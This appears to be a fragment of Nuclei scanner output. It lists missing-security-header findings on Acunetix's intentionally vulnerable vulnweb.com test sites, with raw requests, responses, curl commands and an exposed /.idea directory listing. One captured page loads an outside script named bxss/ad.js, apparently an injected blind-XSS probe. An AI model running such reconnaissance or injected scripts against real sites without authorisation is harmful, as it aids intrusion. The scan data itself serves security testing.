'http://testhtml5.vulnweb.com/logout'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/.idea/.name\",\"path\":\"/.idea/.name\",\"matched-at\":\"http://testphp.vulnweb.com/.idea/.name\",\"request\":\"GET /.idea/.name HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 6\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nEtag: \\\"4f911cd6-6\\\"\\r\\nLast-Modified: Fri, 20 Apr 2012 08:22:46 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\nacuart\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:50.983260912Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2' 'http://testphp.vulnweb.com/.idea/.name'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com\",\"matched-at\":\"http://testhtml5.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n\\n \\u003clink rel=\\\"icon\\\" type=\\\"image/png\\\" href=\\\"http://www.acunetix.com/favicon.ico\\\"\\u003e\\n\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n Vulnerable HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n\\n \\u003cp class=\\\"navbar-text pull-right\\\"\\u003e\\n \\n \\u003ca href=\\\"#myModal\\\" role=\\\"button\\\" class=\\\"btn\\\" data-toggle=\\\"modal\\\"\\u003eLogin\\u003c/a\\u003e\\n \\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eViews\\u003c/li\\u003e\\n \\u003cli id=\\\"popularLi\\\" class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/popular\\\"\\u003ePopular\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/latest\\\"\\u003eLatest\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/carousel\\\"\\u003eCarousel\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/archive\\\"\\u003eArchive\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eWebsite\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/about\\\"\\u003eAbout\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/contact\\\"\\u003eContact\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv ng-view\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"pull-left\\\" style=\\\"font-size: xx-small;\\\" id=\\\"refId\\\"\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp class=\\\"pull-left\\\"\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\n\\u003c!-- Modal --\\u003e\\n\\u003cdiv id=\\\"myModal\\\" class=\\\"modal hide fade\\\" tabindex=\\\"-1\\\" role=\\\"dialog\\\" aria-labelledby=\\\"myModalLabel\\\" aria-hidden=\\\"true\\\"\\u003e\\n \\u003cform class=\\\"modal-body\\\" action=\\\"/login\\\" method=\\\"POST\\\" id=\\\"loginForm\\\"\\u003e\\n \\u003cdiv class=\\\"modal-header\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"close\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003e×\\u003c/button\\u003e\\n \\u003ch3 id=\\\"myModalLabel\\\"\\u003eLogin\\u003c/h3\\u003e\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-body\\\"\\u003e\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Username --\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"username\\\"\\u003eUsername\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"text\\\" id=\\\"username\\\" name=\\\"username\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\" value=\\\"admin\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Password--\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"password\\\"\\u003ePassword\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"password\\\" id=\\\"password\\\" name=\\\"password\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003ca href=\\\"#\\\" class=\\\"btn\\\" id=\\\"loginFormForgot\\\"\\u003eForgot Pwd?\\u003c/a\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-footer\\\"\\u003e\\n \\u003cbutton class=\\\"btn btn-primary\\\" id=\\\"loginFormSubmit\\\"\\u003eLogin\\u003c/button\\u003e\\n \\u003cbutton class=\\\"btn\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003eClose\\u003c/button\\u003e\\n \\u003c/div\\u003e\\n \\u003c/form\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c!-- App libs --\\u003e\\n\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/libs/sessvars.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/post.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/controllers/controllers.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/services/itemsService.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://bxss.s3.amazonaws.com/ad.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:51.371382726Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46' 'http://testhtml5.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/.idea\",\"path\":\"/.idea\",\"matched-at\":\"http://testphp.vulnweb.com/.idea/\",\"request\":\"GET /.idea HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:51 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /.idea/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /.idea/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"scopes/\\\"\\u003escopes/\\u003c/a\\u003e 13-Nov-2012 13:29 -\\r\\n\\u003ca href=\\\"acuart.iml\\\"\\u003eacuart.iml\\u003c/a\\u003e 20-Apr-2012 08:22 292\\r\\n\\u003ca href=\\\"encodings.xml\\\"\\u003eencodings.xml\\u003c/a\\u003e 20-Apr-2012 08:22 171\\r\\n\\u003ca href=\\\"misc.xml\\\"\\u003emisc.xml\\u003c/a\\u003e 20-Apr-2012 08:22 266\\r\\n\\u003ca href=\\\"modules.xml\\\"\\u003emodules.xml\\u003c/a\\u003e 20-Apr-2012 08:22 275\\r\\n\\u003ca href=\\\"vcs.xml\\\"\\u003evcs.xml\\u003c/a\\u003e 20-Apr-2012 08:22 173\\r\\n\\u003ca href=\\\"workspace.xml\\\"\\u003eworkspace.xml\\u003c/a\\u003e 20-Apr-2012 08:23 12473\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:51.965756048Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0' 'http://testphp.vulnweb.com/.idea'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testaspnet.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testaspnet.vulnweb.com\",\"matched-at\":\"http://testaspnet.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testaspnet.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 14069\\r\\nCache-Control: private\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:45 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nSet-Cookie: ASP.NET_SessionId=vmit32btaeasjnawkbexxh55; path=/; HttpOnly\\r\\nX-Aspnet-Version: 2.0.50727\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.0 Transitional//EN\\\" \\u003e\\r\\n\\u003cHTML\\u003e\\r\\n\\t\\u003cHEAD\\u003e\\r\\n\\t\\t\\u003ctitle\\u003eacublog news\\u003c/title\\u003e\\r\\n\\t\\t\\u003cMETA http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=windows-1252\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"Microsoft Visual Studio .NET 7.1\\\" name=\\\"GENERATOR\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"C#\\\" name=\\\"CODE_LANGUAGE\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"JavaScript\\\" name=\\\"vs_defaultClientScript\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"http://schemas.microsoft.com/intellisense/ie5\\\" name=\\\"vs_targetSchema\\\"\\u003e\\r\\n\\t\\t\\u003cLINK href=\\\"styles.css\\\" type=\\\"text/css\\\" rel=\\\"stylesheet\\\"\\u003e\\r\\n\\t\\u003c/HEAD\\u003e\\r\\n\\t\\u003cbody\\u003e\\r\\n\\t\\t\\u003cform name=\\\"Form1\\\" method=\\\"post\\\" action=\\\"default.aspx\\\" id=\\\"Form1\\\"\\u003e\\r\\n\\u003cdiv\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTTARGET\\\" id=\\\"__EVENTTARGET\\\" value=\\\"\\\" /\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTARGUMENT\\\" id=\\\"__EVENTARGUMENT\\\" value=\\\"\\\" /\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__VIEWSTATE\\\" id=\\\"__VIEWSTATE\\\" value=\\\"/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5\\\" /\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\r\\n\\u003cscript type=\\\"text/javascript\\\"\\u003e\\r\\n//\\u003c![CDATA[\\r\\nvar theForm = document.forms['Form1'];\\r\\nif (!theForm) {\\r\\n theForm = document.Form1;\\r\\n}\\r\\nfunction __doPostBack(eventTarget, eventArgument) {\\r\\n if (!theForm.onsubmit || (theForm.onsubmit() != false)) {\\r\\n theForm.__EVENTTARGET.value = eventTarget;\\r\\n theForm.__EVENTARGUMENT.value = eventArgument;\\r\\n theForm.submit();\\r\\n }\\r\\n}\\r\\n//]]\\u003e\\r\\n\\u003c/script\\u003e\\r\\n\\r\\n\\r\\n\\u003cdiv\\u003e\\r\\n\\r\\n\\t\\u003cinput type=\\\"hidden\\\" name=\\\"__VIEWSTATEGENERATOR\\\" id=\\\"__VIEWSTATEGENERATOR\\\" value=\\\"CA0B0334\\\" /\\u003e\\r\\n\\t\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTVALIDATION\\\" id=\\\"__EVENTVALIDATION\\\" value=\\\"/wEWVwLpus/wCAKv3NmgDwKB48+iAgK20qX9DwK20qX9DwK20tmRBwK20tmRBwK20o35BQK20o35BQK20qGcDQK20qGcDQKL+bMFAov5swUCi/mn2AkCi/mn2AkCi/nb/AICi/nb/AICi/nPkwoCi/nPkwoCi/njtgMCi/njtgMCi/mXzQwCi/mXzQwCi/mL4AUCi/mL4AUCi/m/hw0Ci/m/hw0Ci/mT7AsCi/mT7AsCi/mHgwMCi/mHgwMCvJPzxAkCvJPzxAkCvJPnmwECvJPnmwECvJObvgoCvJObvgoCvJOP1QMCvJOP1QMCvJOj6AwCvJOj6AwCvJPXjAQCvJPXjAQCvJPLow0CvJPLow0CvJP/xgYCvJP/xgYCvJPTrwMCvJPTrwMCvJPHwgwCvJPHwgwCkbrR6w8CkbrR6w8CkbrFjgcCkbrFjgcCkbr5JQKRuvklApG67fgJApG67fgJApG6gZ8BApG6gZ8BApG6tbIKApG6tbIKApG6qckDApG6qckDApG63e0MApG63e0MApG6sdUJApG6sdUJApG6pegCApG6pegCAtTZ5J4HAtTZ5J4HAtTZmDUC1NmYNQLU2YzICQLU2YzICQLU2aDvAgLU2aDvAgLU2dSDCgLU2dSDCgLU2cimAwLU2cimAwLU2fz9DALU2fz9DALU2ZCQBALU2ZCQBBM7QfLxs46Xr8rthEeGdU4fr+Ig\\\" /\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\t\\t\\t\\r\\n\\u003cTABLE id=\\\"Table1\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"5\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\u003cTR\\u003e\\r\\n\\t\\t\\u003cTD style=\\\"COLOR: #e6dccf\\\" bgColor=\\\"#806640\\\" height=\\\"75\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cIMG src=\\\"images/logo_acunetix.gif\\\" align=\\\"absMiddle\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/TD\\u003e\\r\\n\\t\\t\\u003cTD style=\\\"FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf\\\" align=\\\"right\\\" bgColor=\\\"#806640\\\"\\r\\n\\t\\t\\theight=\\\"75\\\"\\u003eTest Website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/TD\\u003e\\r\\n\\t\\u003c/TR\\u003e\\r\\n\\u003c/TABLE\\u003e\\r\\n\\u003cTABLE id=\\\"Table2\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"5\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\u003cTR\\u003e\\r\\n\\t\\t\\u003cTD class=\\\"MenuBar\\\" style=\\\"BORDER-LEFT: #806040 1px solid\\\"\\u003e\\u003cA class=\\\"menu\\\" title=\\\"About\\\" href=\\\"about.aspx\\\"\\u003eabout\\u003c/A\\u003e\\r\\n\\t\\t\\t\\u003cA class=\\\"menu\\\" title=\\\"Latest news\\\" href=\\\"default.aspx\\\"\\u003enews\\u003c/A\\u003e \\u003ca href=\\\"login.aspx\\\" id=\\\"Mainmenu2_lnkLog\\\" class=\\\"menu\\\" name=\\\"lnkLog\\\"\\u003elogin\\u003c/a\\u003e \\u003ca href=\\\"Signup.aspx\\\" id=\\\"Mainmenu2_lnkSignup\\\" class=\\\"menu\\\" name=\\\"lnkSignup\\\"\\u003e\\r\\n\\t\\t\\t\\tsignup\\u003c/a\\u003e \\u003cA class=\\\"menu\\\" title=\\\"Network scanner\\\" href=\\\"https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/\\\"\\u003enetwork scanner\\u003c/A\\u003e\\r\\n\\t\\t\\t\\t\\u003cA class=\\\"menu\\\" title=\\\"Network vuln help\\\" href=\\\"https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/\\\"\\u003enetwork vuln help\\u003c/A\\u003e\\r\\n\\t\\t\\u003c/TD\\u003e\\r\\n\\t\\t\\u003ctd class=\\\"MenuBar\\\" align=\\\"right\\\" width=\\\"50px\\\"\\u003e\\r\\n\\t\\t\\t\\u003cA href=\\\"rssFeed.aspx\\\"\\u003e\\u003cIMG src=\\\"images/rss.gif\\\" border=\\\"0\\\"\\u003e\\u003c/A\\u003e\\r\\n\\t\\t\\u003c/td\\u003e\\r\\n\\t\\u003c/TR\\u003e\\r\\n\\u003c/TABLE\\u003e\\r\\n\\r\\n\\t\\t\\t\\u003cTABLE id=\\\"Table1\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"10\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\t\\t\\t\\u003cTR\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cTD id=\\\"tdPageData\\\" valign=\\\"top\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 5/16/2019 12:32:30 PM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=0\\\" class=\\\"NewsOperation\\\"\\u003e(37) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=0\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eAcunetix Vulnerability Scanner Now With Network Security 